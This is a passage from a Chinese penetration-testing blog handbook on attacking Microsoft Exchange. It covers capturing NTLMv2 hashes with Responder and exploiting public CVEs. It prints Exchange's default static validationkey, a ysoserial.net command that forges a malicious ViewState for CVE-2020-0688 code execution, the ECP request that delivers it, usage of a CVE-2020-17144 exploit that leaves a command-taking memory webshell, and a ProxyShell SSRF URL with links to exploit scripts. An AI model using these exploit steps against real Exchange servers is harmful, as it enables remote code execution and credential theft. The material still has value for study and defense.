<p><img src="https://cdn.nlark.com/yuque/0/2023/png/2738075/1677573573060-160ce516-8fe8-48e4-87a2-d06361bf7644.png#averageHue=%23f9f9f9&amp;clientId=u4cc03ecd-4c9e-4&amp;from=paste&amp;height=194&amp;id=ud6c2dcd3&amp;name=image.png&amp;originHeight=388&amp;originWidth=1618&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=80288&amp;status=done&amp;style=none&amp;taskId=u9a2f1b77-e5af-4799-90c6-0ace263f689&amp;title=&amp;width=809" alt="image.png"></p>
<ol start="2">
<li>在攻击机上启动responder监控eth0网卡</li>
</ol>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/2738075/1677573614867-56f7ad8a-492b-4b57-9a0a-7f219bc53ee6.png#averageHue=%23292c36&amp;clientId=u4cc03ecd-4c9e-4&amp;from=paste&amp;height=619&amp;id=ue2255c5f&amp;name=image.png&amp;originHeight=1238&amp;originWidth=1402&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=328822&amp;status=done&amp;style=none&amp;taskId=u3206af4b-b55e-4d83-8ac9-2e0672da478&amp;title=&amp;width=701" alt="image.png"></p>
<ol start="3">
<li>再登录administrator假装点击邮件，responder接受到NTLMv2 hash</li>
</ol>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/2738075/1677573647556-97a8b3f8-6439-4c8f-af8e-147b6fd13afc.png#averageHue=%23282e38&amp;clientId=u4cc03ecd-4c9e-4&amp;from=paste&amp;height=128&amp;id=ue7b9ab5d&amp;name=image.png&amp;originHeight=256&amp;originWidth=1606&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=363551&amp;status=done&amp;style=none&amp;taskId=ucbb492b6-d008-4b0a-a269-14293f8f2f1&amp;title=&amp;width=803" alt="image.png"><br>参考文章： <a target="_blank" rel="noopener" href="https://paper.seebug.org/833/">https://paper.seebug.org/833/</a><br>参考文章： <a target="_blank" rel="noopener" href="https://shu1l.github.io/2021/08/19/exchange-gong-ji-lian-fu-xian/">https://shu1l.github.io/2021/08/19/exchange-gong-ji-lian-fu-xian/</a><br><a name="WTThL"></a></p>
<h3 id="8-公开CVE漏洞"><a href="#8-公开CVE漏洞" class="headerlink" title="8. 公开CVE漏洞"></a>8. 公开CVE漏洞</h3><p><a name="UHdBk"></a></p>
<h4 id="8-1-CVE-2020-0688"><a href="#8-1-CVE-2020-0688" class="headerlink" title="8.1  CVE-2020-0688"></a>8.1  CVE-2020-0688</h4><p><strong>影响范围</strong></p>
<ul>
<li>Microsoft Exchange Server 2010 Service Pack 3</li>
<li>Microsoft Exchange Server 2013</li>
<li>Microsoft Exchange Server 2016</li>
<li>Microsoft Exchange Server 2019</li>
</ul>
<p> <strong>漏洞原理</strong><br>Exchange Server在默认安装的情况下，validationKey和decryptionKey都是相同的，攻击者可以利用静态密钥对服务器发起攻击，在服务器中以SYSTEM权限远程执行代码。ViewState机制时ASP.NET中对同一个Page的多次请求（PostBack）之间维持Page及控件状态的一种机制。在WebForm中，每次请求都会存在客户端和服务器之间的一个交互。如果请求完成之后将一些信息传回客户端，下次请求的时候客户端再将这些状态信息提交给服务器，服务器端对这些信息使用和处理，再将这些信息传回给客户端，这就是ViewState的基本工作模式。ViewState的设计目的就是为了将必要的信息持久化在页面中，这样就可以通过ViewState在页面回传的过程中保存状态值。<br>关于ViewState反序列化详细解释：<br><a target="_blank" rel="noopener" href="https://paper.seebug.org/1386/#3-webconfig-viewstate">https://paper.seebug.org/1386/#3-webconfig-viewstate</a><br><strong>ViewState概述</strong><br>因为Exchange Server在默认的配置下validationKey和decryptionKey分别表示校验和加密所用的密钥，且都是硬编码。<br>其中静态密钥<br>validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF（默认） <br>validationalg = SHA1（默认） <br>generator = B97B4E27（默认） <br>viewstateuserkey = ASP.NET_SessionId的值 <br><img src="https://cdn.nlark.com/yuque/0/2023/png/2738075/1677637121631-fada80c7-0c2f-4383-9e4a-d38c22988a3b.png#averageHue=%23fbf9f8&amp;clientId=uc87b65df-1628-4&amp;from=paste&amp;height=49&amp;id=u72ed828b&amp;name=image.png&amp;originHeight=98&amp;originWidth=1562&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=64805&amp;status=done&amp;style=none&amp;taskId=u0b628f6b-baef-4165-94c1-27b9837a950&amp;title=&amp;width=781" alt="image.png"><br>1.上述提供信息可通过控制台获取 <br>要构造ViewState还需要viewstateuserkey和__VIEWSTATEGENERATOR<br>:::info<br>document.getElementById(“__VIEWSTATEGENERATOR”).value <br>document.getElementById(“__VIEWSTATE”).value<br>:::<br><img src="https://cdn.nlark.com/yuque/0/2023/png/2738075/1677637202857-bff70068-a670-4280-a495-6404f3723516.png#averageHue=%23f5f0c7&amp;clientId=uc87b65df-1628-4&amp;from=paste&amp;height=199&amp;id=u365e5ceb&amp;name=image.png&amp;originHeight=398&amp;originWidth=1620&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=260636&amp;status=done&amp;style=none&amp;taskId=u65f02217-f180-4750-a0cb-3a4504bb51f&amp;title=&amp;width=810" alt="image.png"><br>2.通过获取到validationkey,validationalg,viewstateuserkey,__VIEWSTATEGENERATOR。就可以用使用YSoSerial.net生成序列化后的恶意的ViewState数据。</p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ysoserial下载地址： https://github.com/pwntester/ysoserial.net</span><br><span class="line"></span><br><span class="line">ysoserial.exe -p ViewState -g TextFormattingRunProperties -c <span class="string">"ping dnslog.cn"</span> --validationalg=<span class="string">"SHA1"</span> --validationkey=<span class="string">"CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"</span> --generator=<span class="string">"{填入__VIEWSTATEGENERATOR}"</span> --viewstateuserkey=<span class="string">"{填入viewstateuserkey，也就是ASP.NET_SessionId}"</span> --isdebug –islegacy</span><br></pre></td></tr></tbody></table></figure>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/2738075/1677637482076-b2ab047d-80fd-4925-bc62-df49ef6795b0.png#averageHue=%2315100c&amp;clientId=uc87b65df-1628-4&amp;from=paste&amp;height=243&amp;id=u149ffae9&amp;name=image.png&amp;originHeight=486&amp;originWidth=1602&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=772518&amp;status=done&amp;style=none&amp;taskId=u13a8d037-6e67-43df-9fcb-86209f8d2b3&amp;title=&amp;width=801" alt="image.png"><br>3.构造链接访问即可</p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/ecp/default.aspx?__VIEWSTATEGENERATOR={填入__VIEWSTATEGENERATOR}&amp;__VIEWSTATE={填入YSoSerial.net生成的urlencode 过的ViewState}</span><br></pre></td></tr></tbody></table></figure>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/2738075/1677637555403-60e01aff-8265-4b75-82c2-3ad39bd72e2e.png#averageHue=%23f3f3f3&amp;clientId=uc87b65df-1628-4&amp;from=paste&amp;height=290&amp;id=u3bf18649&amp;name=image.png&amp;originHeight=580&amp;originWidth=1662&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=137658&amp;status=done&amp;style=none&amp;taskId=uf29c9d5a-aaea-46e7-a263-9ef6d4257da&amp;title=&amp;width=831" alt="image.png"><br><a name="zxPYG"></a></p>
<h4 id="8-2-CVE-2020-17144"><a href="#8-2-CVE-2020-17144" class="headerlink" title="8.2 CVE-2020-17144"></a>8.2 CVE-2020-17144</h4><p>需要普通用户凭据的情况下的RCE,就Exchange2010能用<br>工具链接： <a target="_blank" rel="noopener" href="https://github.com/Airboi/CVE-2020-17144-EXP">https://github.com/Airboi/CVE-2020-17144-EXP</a><br>工具链接： <a target="_blank" rel="noopener" href="https://github.com/zcgonvh/CVE-2020-17144">https://github.com/zcgonvh/CVE-2020-17144</a><br>:::info<br>CVE-2020-17144 <target> <user> <pass> <br>执行完之后会有个内存马,访问<br>http://[target]/ews/soap/?pass=命令</pass></user></target></p>
<p>注意：<br>默认监听的是80端口的,咱们访问EWS接口一般用443,就以为没打成功,实际成功了<br>:::<br><img src="https://cdn.nlark.com/yuque/0/2023/png/2738075/1677637812605-1c28664b-1fa0-42a3-b57b-1ed9a745c7ea.png#averageHue=%23e4e3e0&amp;clientId=uc87b65df-1628-4&amp;from=paste&amp;height=216&amp;id=uc2c3f0c1&amp;name=image.png&amp;originHeight=432&amp;originWidth=1660&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=97951&amp;status=done&amp;style=none&amp;taskId=uc612eed8-9039-4208-ae2c-6481750006e&amp;title=&amp;width=830" alt="image.png"><br><a name="a4MG0"></a></p>
<h4 id="8-3-CVE-2021-31207"><a href="#8-3-CVE-2021-31207" class="headerlink" title="8.3 CVE-2021-31207"></a>8.3 CVE-2021-31207</h4><p><strong>影响范围</strong></p>
<ul>
<li>Exchange Server 2013 &lt; May21SU</li>
<li>Exchange Server 2016 &lt; May21SU &lt; CU21</li>
<li>Exchange Server 2019 &lt; May21SU &lt; CU10用户在认证之后，可以写入任意后缀文件结合上面的漏洞，用户首先通过ssrf漏洞访问powershell接口，利用该接口导出邮件到指定web目录下。但是这样还存在一个问题，导出的邮件是pst编码的，所以需要再提前编码一次。</li>
</ul>
<p><strong>漏洞原理</strong><br>用户在认证之后，可以写入任意后缀文件<br><strong>利用过程</strong><br>CVE-2021-34473，CVE-2021-31207和CVE-2021-34523一起来利用就是proxyshell，最终可以实现rce。<br>利用脚本：<br><a target="_blank" rel="noopener" href="https://github.com/horizon3ai/proxyshell">https://github.com/horizon3ai/proxyshell</a></p>
<p><a name="ul4rl"></a></p>
<h4 id="8-4-CVE-2021-34473"><a href="#8-4-CVE-2021-34473" class="headerlink" title="8.4 CVE-2021-34473"></a>8.4 CVE-2021-34473</h4><p><strong>影响范围</strong></p>
<ul>
<li>Exchange Server 2013 &lt; Apr21SU</li>
<li>Exchange Server 2016 &lt; Apr21SU &lt; CU21</li>
<li>Exchange Server 2019 &lt; Apr21SU &lt; CU10 #### 漏洞原理在HttpProxy\EwsAutodiscoverProxyRequestHandler.cs的·GetClientUrlForProxy函数中剔除absoluteUri中的this.explicitLogonAddress，而this.explicitLogonAddress的取值来自（GET|POST|Cookie|Server）请求中Email的值，但是需要满足RequestPathParser.IsAutodiscoverV2PreviewRequest()的返回值为true，这个则是检查路径中是否存在/autodiscove.json</li>
</ul>
<p><strong>利用过程</strong></p>
<ol>
<li>构造URL <a target="_blank" rel="noopener" href="https://192.168.159.131/autodiscover/autodiscover.json?@foo.com/mapi/nspi/?&amp;Email=autodiscover/autodiscover.json?@foo.com">https://192.168.159.131/autodiscover/autodiscover.json?@foo.com/mapi/nspi/?&amp;Email=autodiscover/autodiscover.json%3f@foo.com</a></li>
</ol>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/2738075/1677639146000-de1d90e7-f184-4260-9087-7678f74d26b7.png#averageHue=%23fcfbfb&amp;clientId=uc87b65df-1628-4&amp;from=paste&amp;height=463&amp;id=u65e7e474&amp;name=image.png&amp;originHeight=926&amp;originWidth=1586&amp;originalType=binary&amp;ratio=2&amp;rotation=0&amp;showTitle=false&amp;size=277891&amp;status=done&amp;style=none&amp;taskId=u49a8b536-2f63-49b2-a253-6fbd7ffa7db&amp;title=&amp;width=793" alt="image.png"><br><a name="ozpMB"></a></p>
<h4 id="8-5-CVE-2020-16875"><a href="#8-5-CVE-2020-16875" class="headerlink" title="8.5 CVE-2020-16875"></a>8.5 CVE-2020-16875</h4><p><a target="_blank" rel="noopener" href="https://srcincite.io/pocs/cve-2020-16875.py.txt">https://srcincite.io/pocs/cve-2020-16875.py.txt</a><br><a name="YLeLI"></a></p>
<h3 id="9-实战脚本利用"><a href="#9-实战脚本利用" class="headerlink" title="9.实战脚本利用"></a>9.实战脚本利用</h3><p>参考链接： <a target="_blank" rel="noopener" href="https://saucer-man.com/information_security/776.html">https://saucer-man.com/information_security/776.html</a></p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">椿</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://example.com/2023/03/09/Exchange%20%E6%94%BB%E9%98%B2%E6%89%8B%E5%86%8C/">http://example.com/2023/03/09/Exchange%20%E6%94%BB%E9%98%B2%E6%89%8B%E5%86%8C/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">椿</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            <span class="chip bg-color">无标签</span>
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.png" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="far fa-dot-circle"></i>&nbsp;本篇
            </div>
            <div class="card">
                <a href="/2023/03/09/Exchange%20%E6%94%BB%E9%98%B2%E6%89%8B%E5%86%8C/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/0.jpg" class="responsive-img" alt="">
                        
                        <span class="card-title"></span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2023-03-09
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            椿
                            
                        </span>
                    </div>
                </div>

                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2023/03/07/hello-world/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/12.jpg" class="responsive-img" alt="Hello World">
                        
                        <span class="card-title">Hello World</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2023-03-07
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            椿
                            
                        </span>
                    </div>
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>


<script>
    $('#articleContent').on('copy', function (e) {
        // IE8 or earlier browser is 'undefined'
        if (typeof window.getSelection === 'undefined') return;

        var selection = window.getSelection();
        // if the selection is short let's not annoy our users.
        if (('' + selection).length < Number.parseInt('1')) {
            return;
        }

        // create a div outside of the visible area and fill it with the selected text.
        var bodyElement = document.getElementsByTagName('body')[0];
        var newdiv = document.createElement('div');
        newdiv.style.position = 'absolute';
        newdiv.style.left = '-99999px';
        bodyElement.appendChild(newdiv);
        newdiv.appendChild(selection.getRangeAt(0).cloneContents());

        // we need a <pre> tag workaround.
        // otherwise the text inside "pre" loses all the line breaks!
        if (selection.getRangeAt(0).commonAncestorContainer.nodeName === 'PRE') {
            newdiv.innerHTML = "<pre>" + newdiv.innerHTML + "</pre>";
        }

        var url = document.location.href;
        newdiv.innerHTML += '<br />'
            + '来源: 椿<br />'
            + '文章作者: 椿<br />'
            + '文章链接: <a href="' + url + '">' + url + '</a><br />'
            + '本文章著作权归椿所有，任何形式的转载都请注明出处。';

        selection.selectAllChildren(newdiv);
        window.setTimeout(function () {bodyElement.removeChild(newdiv);}, 200);
    });
</script>


<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: ;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme=''
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    
    <div class="container row center-align" style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2021-2023</span>
            
            <span id="year">2021</span>
            <a href="/about" target="_blank">椿</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                class="white-color">2.8k</span>&nbsp;字
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/intimatep" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:intimate0@163.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=370437946" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 370437946" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

	
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
